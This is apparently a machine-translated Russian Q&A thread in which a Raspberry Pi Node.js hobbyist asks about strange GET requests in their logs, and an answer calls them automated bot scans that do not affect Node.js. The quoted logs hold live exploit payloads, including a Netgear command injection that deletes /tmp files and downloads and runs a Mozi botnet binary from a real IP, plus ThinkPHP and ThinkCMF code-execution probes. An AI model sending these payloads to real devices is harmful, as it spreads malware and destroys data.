Запустил свой собственный проект node.js веб-сервера - что это за запросы GET?

Question

Недавно я настроил домашний веб-сервер для запуска моего node.js и express веб-приложения (используя Raspberry Pi, в основном, чтобы выяснить, как это сделать).

Не долго (часы) после активации его в моем домене я зарегистрировал следующие запросы GET:

0|app.js   | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://218.77.224.248:55400/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 404 23.779 ms - 922
0|app.js   | GET /solr/admin/info/system?wt=json 404 25.780 ms - 922
0|app.js   | GET /?XDEBUG_SESSION_START=phpstorm 200 24.322 ms - 170
0|app.js   | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 200 21.867 ms - 170
0|app.js   | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 404 25.449 ms - 922

Был ли мой сервер атакован?

Если да, то как злоумышленник нацелился на меня?

Как мне предотвратить атаки и обеспечить хорошую безопасность?

Или я все неправильно читаю?

Спасибо

Answer 1

Вас атакуют ... Но вы в порядке, поскольку эти атаки не влияют на Node.JS. https://forum.codeigniter.com/thread-75932.html

Эти атаки, вероятно, были просто автоматическими (поскольку они просто использовали случайные эксплойты на вашем веб-сервере), и злоумышленник, вероятно, был ботом, запрограммированным на использование общих эксплойтов на веб-серверах. .

Насчет хорошей безопасности ... Это сложно сделать правильно. Я предлагаю вам начать здесь с Express документации, а затем просто go в Интернете и посмотреть, какие результаты появятся.